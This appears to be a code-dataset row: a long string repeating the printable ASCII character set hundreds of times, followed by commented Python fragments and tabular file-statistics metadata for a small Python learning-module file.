abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD"""
# )
# )
# pass
| 777.309524
| 31,669
| 0.64885
| 434
| 32,647
| 48.029954
| 0.142857
| 1.933317
| 2.891053
| 3.84284
| 0.971936
| 0.971936
| 0.969633
| 0.969633
| 0.969633
| 0.969633
| 0
| 0.101967
| 0.017398
| 32,647
| 41
| 31,670
| 796.268293
| 0.547835
| 0.985297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 16
|
6c735644facc86bc372f7ae36a57a7daac7de028
| 103
|
py
|
Python
|
python/learn/base/module/l1/pack/big/b3.py
|
qrsforever/workspace
|
53c7ce7ca7da62c9fbb3d991ae9e4e34d07ece5f
|
[
"MIT"
] | 2
|
2017-06-07T03:20:42.000Z
|
2020-01-07T09:14:26.000Z
|
python/learn/base/module/l1/pack/big/b3.py
|
qrsforever/workspace
|
53c7ce7ca7da62c9fbb3d991ae9e4e34d07ece5f
|
[
"MIT"
] | null | null | null |
python/learn/base/module/l1/pack/big/b3.py
|
qrsforever/workspace
|
